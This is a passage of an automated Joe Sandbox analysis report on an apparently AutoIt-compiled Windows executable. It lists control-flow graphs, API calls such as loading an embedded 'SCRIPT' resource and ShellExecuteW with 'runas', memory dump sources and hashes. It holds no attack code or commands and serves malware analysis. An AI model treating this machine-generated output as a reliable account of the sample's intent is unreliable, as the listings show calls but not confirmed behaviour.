97966->98002 98000 6a3084 22 API calls 97967->98000 97969 6a3006 98003 6a70b0 23 API calls 97969->98003 97974 6a3021 97975 6a3065 97974->97975 98004 6a6f88 22 API calls 97974->98004 98005 6a70b0 23 API calls 97974->98005 98006 6a3084 22 API calls 97974->98006 97978 6a4af0 __wsopen_s 97977->97978 97979 6a6b57 22 API calls 97978->97979 97980 6a4b22 97978->97980 97979->97980 97981 6a4c6d 22 API calls 97980->97981 97990 6a4b58 97980->97990 97981->97980 97982 6a4c6d 22 API calls 97982->97990 97983 6a9cb3 22 API calls 97985 6a4c52 97983->97985 97984 6a9cb3 22 API calls 97984->97990 97986 6a515f 22 API calls 97985->97986 97987 6a4c5e 97986->97987 97987->97902 97988 6a515f 22 API calls 97988->97990 97989 6a4c29 97989->97983 97989->97987 97990->97982 97990->97984 97990->97988 97990->97989 97991->97918 97992->97925 97993->97933 97994->97943 97995->97946 97996->97951 97997->97956 97998->97959 97999->97963 98000->97960 98001->97966 98002->97969 98003->97974 98004->97974 98005->97974 98006->97974 98007->97926 98008->97930 98009->97937 98010->97944 98011->97954

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 234 6a42de-6a434d call 6aa961 GetVersionExW call 6a6b57 239 6e3617-6e362a 234->239 240 6a4353 234->240 242 6e362b-6e362f 239->242 241 6a4355-6a4357 240->241 243 6a435d-6a43bc call 6a93b2 call 6a37a0 241->243 244 6e3656 241->244 245 6e3632-6e363e 242->245 246 6e3631 242->246 263 6e37df-6e37e6 243->263 264 6a43c2-6a43c4 243->264 249 6e365d-6e3660 244->249 245->242 248 6e3640-6e3642 245->248 246->245 248->241 251 6e3648-6e364f 248->251 252 6a441b-6a4435 GetCurrentProcess IsWow64Process 249->252 253 6e3666-6e36a8 249->253 251->239 255 6e3651 251->255 258 6a4437 252->258 259 6a4494-6a449a 252->259 253->252 256 6e36ae-6e36b1 253->256 255->244 261 6e36db-6e36e5 256->261 262 6e36b3-6e36bd 256->262 260 6a443d-6a4449 258->260 259->260 265 6a444f-6a445e LoadLibraryA 260->265 266 6e3824-6e3828 GetSystemInfo 260->266 270 6e36f8-6e3702 261->270 271 6e36e7-6e36f3 261->271 267 6e36bf-6e36c5 262->267 268 6e36ca-6e36d6 262->268 272 6e37e8 263->272 273 6e3806-6e3809 263->273 264->249 269 6a43ca-6a43dd 264->269 274 6a449c-6a44a6 GetSystemInfo 265->274 275 6a4460-6a446e GetProcAddress 265->275 267->252 268->252 276 6e3726-6e372f 269->276 277 6a43e3-6a43e5 269->277 279 6e3704-6e3710 270->279 280 6e3715-6e3721 270->280 271->252 278 6e37ee 272->278 281 6e380b-6e381a 273->281 282 6e37f4-6e37fc 273->282 285 6a4476-6a4478 274->285 275->274 284 6a4470-6a4474 GetNativeSystemInfo 275->284 288 6e373c-6e3748 276->288 289 6e3731-6e3737 276->289 286 6a43eb-6a43ee 277->286 287 6e374d-6e3762 277->287 278->282 279->252 280->252 281->278 283 6e381c-6e3822 281->283 282->273 283->282 284->285 292 6a447a-6a447b FreeLibrary 285->292 293 6a4481-6a4493 285->293 294 6a43f4-6a440f 286->294 295 6e3791-6e3794 286->295 290 6e376f-6e377b 287->290 291 6e3764-6e376a 287->291 288->252 289->252 290->252 291->252 292->293 297 6e3780-6e378c 294->297 298 6a4415 294->298 295->252 296 6e379a-6e37c1 295->296 299 6e37ce-6e37da 296->299 300 6e37c3-6e37c9 296->300 297->252 298->252 299->252 300->252
                                                        APIs
                                                        • GetVersionExW.KERNEL32(?), ref: 006A430D
                                                          • Part of subcall function 006A6B57: _wcslen.LIBCMT ref: 006A6B6A
                                                        • GetCurrentProcess.KERNEL32(?,0073CB64,00000000,?,?), ref: 006A4422
                                                        • IsWow64Process.KERNEL32(00000000,?,?), ref: 006A4429
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 006A4454
                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 006A4466
                                                        • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 006A4474
                                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 006A447B
                                                        • GetSystemInfo.KERNEL32(?,?,?), ref: 006A44A0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                        • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                        • API String ID: 3290436268-3101561225
                                                        • Opcode ID: e4e769239bdc333128132d07840455a46412c319d0091cbc1fbcb510493c2a78
                                                        • Instruction ID: 0286a7249e77780ef1528ec5e45c527fe1781fa23d07fc625699ffe720b7dd7f
                                                        • Opcode Fuzzy Hash: e4e769239bdc333128132d07840455a46412c319d0091cbc1fbcb510493c2a78
                                                        • Instruction Fuzzy Hash: 82A1E37190A3D0CFCB12DB7D7C441D57FE6AB67380B84C499E08D93B62D6684985CB2D

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1506 6a42a2-6a42ba CreateStreamOnHGlobal 1507 6a42da-6a42dd 1506->1507 1508 6a42bc-6a42d3 FindResourceExW 1506->1508 1509 6a42d9 1508->1509 1510 6e35ba-6e35c9 LoadResource 1508->1510 1509->1507 1510->1509 1511 6e35cf-6e35dd SizeofResource 1510->1511 1511->1509 1512 6e35e3-6e35ee LockResource 1511->1512 1512->1509 1513 6e35f4-6e3612 1512->1513 1513->1509
                                                        APIs
                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,006A50AA,?,?,00000000,00000000), ref: 006A42B2
                                                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,006A50AA,?,?,00000000,00000000), ref: 006A42C9
                                                        • LoadResource.KERNEL32(?,00000000,?,?,006A50AA,?,?,00000000,00000000,?,?,?,?,?,?,006A4F20), ref: 006E35BE
                                                        • SizeofResource.KERNEL32(?,00000000,?,?,006A50AA,?,?,00000000,00000000,?,?,?,?,?,?,006A4F20), ref: 006E35D3
                                                        • LockResource.KERNEL32(006A50AA,?,?,006A50AA,?,?,00000000,00000000,?,?,?,?,?,?,006A4F20,?), ref: 006E35E6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                        • String ID: SCRIPT
                                                        • API String ID: 3051347437-3967369404
                                                        • Opcode ID: b68ee4d564867bdfb38b96839ef0101cf8b2934289cbb6a7cfbebea4d1f70c33
                                                        • Instruction ID: 8a6020bec496b86d6276c9284a85906cf6092536865a589822c79bfc43482068
                                                        • Opcode Fuzzy Hash: b68ee4d564867bdfb38b96839ef0101cf8b2934289cbb6a7cfbebea4d1f70c33
                                                        • Instruction Fuzzy Hash: 56115E71240701BFE7229B65DC49F677BBAEFC6B52F148169F502E6250DBB1DD008B60

                                                        Control-flow Graph

                                                        APIs
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 006A2B6B
                                                          • Part of subcall function 006A3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00771418,?,006A2E7F,?,?,?,00000000), ref: 006A3A78
                                                          • Part of subcall function 006A9CB3: _wcslen.LIBCMT ref: 006A9CBD
                                                        • GetForegroundWindow.USER32(runas,?,?,?,?,?,00762224), ref: 006E2C10
                                                        • ShellExecuteW.SHELL32(00000000,?,?,00762224), ref: 006E2C17
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                                        • String ID: runas
                                                        • API String ID: 448630720-4000483414
                                                        • Opcode ID: b2d77a711f6f4f37b4a07e2235b5ebd52db3eb14a478b8e51fef1262332372e6
                                                        • Instruction ID: 8128e3a2118f40e1595c51636fda5d95f53dac3c18227f5e1d762b1f13f3df31
                                                        • Opcode Fuzzy Hash: b2d77a711f6f4f37b4a07e2235b5ebd52db3eb14a478b8e51fef1262332372e6
                                                        • Instruction Fuzzy Hash: ED110A311083925BCB84FF24D8619BE77A79F93344F44542CF047121A3CF289D4A8F2A
                                                        APIs
                                                        • lstrlenW.KERNEL32(?,006E5222), ref: 0070DBCE
                                                        • GetFileAttributesW.KERNELBASE(?), ref: 0070DBDD
                                                        • FindFirstFileW.KERNELBASE(?,?), ref: 0070DBEE
                                                        • FindClose.KERNEL32(00000000), ref: 0070DBFA
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: FileFind$AttributesCloseFirstlstrlen
                                                        • String ID:
                                                        • API String ID: 2695905019-0
                                                        • Opcode ID: 48944b12a66b0631b100a0a83a3b88d4564a549917efcda5945522e0063fb497
                                                        • Instruction ID: e5d79f1d81dfda30635c50e78e9cd2be234cd7f60476515577dfb50af226df8b
                                                        • Opcode Fuzzy Hash: 48944b12a66b0631b100a0a83a3b88d4564a549917efcda5945522e0063fb497
                                                        • Instruction Fuzzy Hash: 41F0A7314106249BF2316BB89C0D46B3BACAE01335F108702F835D10E0EBB85D5486AA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: BuffCharUpper
                                                        • String ID: p#w
                                                        • API String ID: 3964851224-3682083516
                                                        • Opcode ID: 4f6269a2da6d0a78d615cf2439d7cdef69a0d9510e8b3ee4fe31379ddf7f486a
                                                        • Instruction ID: 35e093dc2a3ef4a6d695ecae8bf61d86c93b400caf257f7c87d86ea990e0cdf4
                                                        • Opcode Fuzzy Hash: 4f6269a2da6d0a78d615cf2439d7cdef69a0d9510e8b3ee4fe31379ddf7f486a
                                                        • Instruction Fuzzy Hash: D4A249706083019FD754EF18C480B6ABBE2BF8A314F14896DE99A8B352D775EC45CF92
                                                        APIs
                                                        • GetInputState.USER32 ref: 006AD807
                                                        • timeGetTime.WINMM ref: 006ADA07
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006ADB28
                                                        • TranslateMessage.USER32(?), ref: 006ADB7B
                                                        • DispatchMessageW.USER32(?), ref: 006ADB89
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006ADB9F
                                                        • Sleep.KERNEL32(0000000A), ref: 006ADBB1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                        • String ID:
                                                        • API String ID: 2189390790-0
                                                        • Opcode ID: fc2dff09ae378f00b3cc1ad3c7fba78d2e56b84d04349de794613c95ebcd1283
                                                        • Instruction ID: 2a45d2118c6711c87c55a15b3a1b8d0a641850b4ca1e8b7692805f09523def40
                                                        • Opcode Fuzzy Hash: fc2dff09ae378f00b3cc1ad3c7fba78d2e56b84d04349de794613c95ebcd1283
                                                        • Instruction Fuzzy Hash: F3420070208206DFE728EB24C854BBAB7E2BF46304F14851DE5668B7A1C774EC85CF92

                                                        Control-flow Graph

                                                        APIs
                                                        • GetSysColorBrush.USER32(0000000F), ref: 006A2D07
                                                        • RegisterClassExW.USER32(00000030), ref: 006A2D31
                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006A2D42
                                                        • InitCommonControlsEx.COMCTL32(?), ref: 006A2D5F
                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006A2D6F
                                                        • LoadIconW.USER32(000000A9), ref: 006A2D85
                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 006A2D94
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                        • API String ID: 2914291525-1005189915
                                                        • Opcode ID: 5404b81c200fb610805079327358df7b790f2f9c34ec256ab62939501c4a8d0c
                                                        • Instruction ID: 3adfbd928a02a58ac3d66baf190147555b57b50fe3e811ac828073168a4e7dc6
                                                        • Opcode Fuzzy Hash: 5404b81c200fb610805079327358df7b790f2f9c34ec256ab62939501c4a8d0c
                                                        • Instruction Fuzzy Hash: 2221FCB5911348AFEB01DF98EC49BDDBBB4FB08741F00811AF615B6290D7B95540CF98

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 302 6e065b-6e068b call 6e042f 305 6e068d-6e0698 call 6cf2c6 302->305 306 6e06a6-6e06b2 call 6d5221 302->306 311 6e069a-6e06a1 call 6cf2d9 305->311 312 6e06cb-6e0714 call 6e039a 306->312 313 6e06b4-6e06c9 call 6cf2c6 call 6cf2d9 306->313 320 6e097d-6e0983 311->320 322 6e0716-6e071f 312->322 323 6e0781-6e078a GetFileType 312->323 313->311 327 6e0756-6e077c GetLastError call 6cf2a3 322->327 328 6e0721-6e0725 322->328 324 6e078c-6e07bd GetLastError call 6cf2a3 CloseHandle 323->324 325 6e07d3-6e07d6 323->325 324->311 341 6e07c3-6e07ce call 6cf2d9 324->341 332 6e07df-6e07e5 325->332 333 6e07d8-6e07dd 325->333 327->311 328->327 329 6e0727-6e0754 call 6e039a 328->329 329->323 329->327 334 6e07e9-6e0837 call 6d516a 332->334 335 6e07e7 332->335 333->334 344 6e0839-6e0845 call 6e05ab 334->344 345 6e0847-6e086b call 6e014d 334->345 335->334 341->311 344->345 351 6e086f-6e0879 call 6d86ae 344->351 352 6e087e-6e08c1 345->352 353 6e086d 345->353 351->320 355 6e08e2-6e08f0 352->355 356 6e08c3-6e08c7 352->356 353->351 358 6e097b 355->358 359 6e08f6-6e08fa 355->359 356->355 357 6e08c9-6e08dd 356->357 357->355 358->320 359->358 361 6e08fc-6e092f CloseHandle call 6e039a 359->361 364 6e0963-6e0977 361->364 365 6e0931-6e095d GetLastError call 6cf2a3 call 6d5333 361->365 364->358 365->364
                                                        APIs
                                                          • Part of subcall function 006E039A: CreateFileW.KERNELBASE(00000000,00000000,?,006E0704,?,?,00000000,?,006E0704,00000000,0000000C), ref: 006E03B7
                                                        • GetLastError.KERNEL32 ref: 006E076F
                                                        • __dosmaperr.LIBCMT ref: 006E0776
                                                        • GetFileType.KERNELBASE(00000000), ref: 006E0782
                                                        • GetLastError.KERNEL32 ref: 006E078C
                                                        • __dosmaperr.LIBCMT ref: 006E0795
                                                        • CloseHandle.KERNEL32(00000000), ref: 006E07B5
                                                        • CloseHandle.KERNEL32(?), ref: 006E08FF
                                                        • GetLastError.KERNEL32 ref: 006E0931
                                                        • __dosmaperr.LIBCMT ref: 006E0938
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                        • String ID: H
                                                        • API String ID: 4237864984-2852464175
                                                        • Opcode ID: 8837c25d59726e8245547b561a3f59a685e5ba80047818bf2675432e3d0191be
                                                        • Instruction ID: cff1588d4b9a200b82300903f62f55f56ea9022393b02b96f0c34831e7fe342b
                                                        • Opcode Fuzzy Hash: 8837c25d59726e8245547b561a3f59a685e5ba80047818bf2675432e3d0191be
                                                        • Instruction Fuzzy Hash: 03A13632A002848FEF19AF68D851BAE3BA2EB06320F14415DF815AB3D1D7759D93CB95

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 006A3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00771418,?,006A2E7F,?,?,?,00000000), ref: 006A3A78
                                                          • Part of subcall function 006A3357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 006A3379
                                                        • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 006A356A
                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 006E318D
                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 006E31CE
                                                        • RegCloseKey.ADVAPI32(?), ref: 006E3210
                                                        • _wcslen.LIBCMT ref: 006E3277
                                                        • _wcslen.LIBCMT ref: 006E3286
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                        • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                        • API String ID: 98802146-2727554177
                                                        • Opcode ID: 10296f6cae217e46fb32f7a7917ba3bb2c3cf9b591efb0248f4f1aa20ae54575
                                                        • Instruction ID: 9901249b3358700decabd5d596b975ad354bac3ccb152ad9009dc86dfd31dfad
                                                        • Opcode Fuzzy Hash: 10296f6cae217e46fb32f7a7917ba3bb2c3cf9b591efb0248f4f1aa20ae54575
                                                        • Instruction Fuzzy Hash: 6F71D6714053109EC344EF25DC419ABB7F9FF85380F40842EF199972A2DB389A89CF69

                                                        Control-flow Graph

                                                        APIs
                                                        • GetSysColorBrush.USER32(0000000F), ref: 006A2B8E
                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 006A2B9D
                                                        • LoadIconW.USER32(00000063), ref: 006A2BB3
                                                        • LoadIconW.USER32(000000A4), ref: 006A2BC5
                                                        • LoadIconW.USER32(000000A2), ref: 006A2BD7
                                                        • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 006A2BEF
                                                        • RegisterClassExW.USER32(?), ref: 006A2C40
                                                          • Part of subcall function 006A2CD4: GetSysColorBrush.USER32(0000000F), ref: 006A2D07
                                                          • Part of subcall function 006A2CD4: RegisterClassExW.USER32(00000030), ref: 006A2D31
                                                          • Part of subcall function 006A2CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006A2D42
                                                          • Part of subcall function 006A2CD4: InitCommonControlsEx.COMCTL32(?), ref: 006A2D5F
                                                          • Part of subcall function 006A2CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006A2D6F
                                                          • Part of subcall function 006A2CD4: LoadIconW.USER32(000000A9), ref: 006A2D85
                                                          • Part of subcall function 006A2CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 006A2D94
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                        • String ID: #$0$AutoIt v3
                                                        • API String ID: 423443420-4155596026
                                                        • Opcode ID: 8a965fdbb1f148ca685559a4dd697c5323c4ee4739c7a8339a387adaf2777f11
                                                        • Instruction ID: 8ba7275416eb54a887b87f87cb720034fed051115832802e736bdaeb63af6f5b
                                                        • Opcode Fuzzy Hash: 8a965fdbb1f148ca685559a4dd697c5323c4ee4739c7a8339a387adaf2777f11
                                                        • Instruction Fuzzy Hash: C1214C71E00314ABEB119FA9EC55B997FB4FB08B90F40C01AF508A66A0D3B90984CF98

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 443 6a3170-6a3185 444 6a3187-6a318a 443->444 445 6a31e5-6a31e7 443->445 447 6a31eb 444->447 448 6a318c-6a3193 444->448 445->444 446 6a31e9 445->446 449 6a31d0-6a31d8 DefWindowProcW 446->449 450 6e2dfb-6e2e23 call 6a18e2 call 6be499 447->450 451 6a31f1-6a31f6 447->451 452 6a3199-6a319e 448->452 453 6a3265-6a326d PostQuitMessage 448->453 454 6a31de-6a31e4 449->454 486 6e2e28-6e2e2f 450->486 456 6a31f8-6a31fb 451->456 457 6a321d-6a3244 SetTimer RegisterWindowMessageW 451->457 459 6e2e7c-6e2e90 call 70bf30 452->459 460 6a31a4-6a31a8 452->460 455 6a3219-6a321b 453->455 455->454 465 6e2d9c-6e2d9f 456->465 466 6a3201-6a3214 KillTimer call 6a30f2 call 6a3c50 456->466 457->455 461 6a3246-6a3251 CreatePopupMenu 457->461 459->455 479 6e2e96 459->479 462 6a31ae-6a31b3 460->462 463 6e2e68-6e2e72 call 70c161 460->463 461->455 469 6e2e4d-6e2e54 462->469 470 6a31b9-6a31be 462->470 484 6e2e77 463->484 472 6e2dd7-6e2df6 MoveWindow 465->472 473 6e2da1-6e2da5 465->473 466->455 469->449 482 6e2e5a-6e2e63 call 700ad7 469->482 477 6a3253-6a3263 call 6a326f 470->477 478 6a31c4-6a31ca 470->478 472->455 480 6e2dc6-6e2dd2 SetFocus 473->480 481 6e2da7-6e2daa 473->481 477->455 478->449 478->486 479->449 480->455 481->478 487 6e2db0-6e2dc1 call 6a18e2 481->487 482->449 484->455 486->449 491 6e2e35-6e2e48 call 6a30f2 call 6a3837 486->491 487->455 491->449
                                                        APIs
                                                        • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,006A316A,?,?), ref: 006A31D8
                                                        • KillTimer.USER32(?,00000001,?,?,?,?,?,006A316A,?,?), ref: 006A3204
                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 006A3227
                                                        • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,006A316A,?,?), ref: 006A3232
                                                        • CreatePopupMenu.USER32 ref: 006A3246
                                                        • PostQuitMessage.USER32(00000000), ref: 006A3267
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
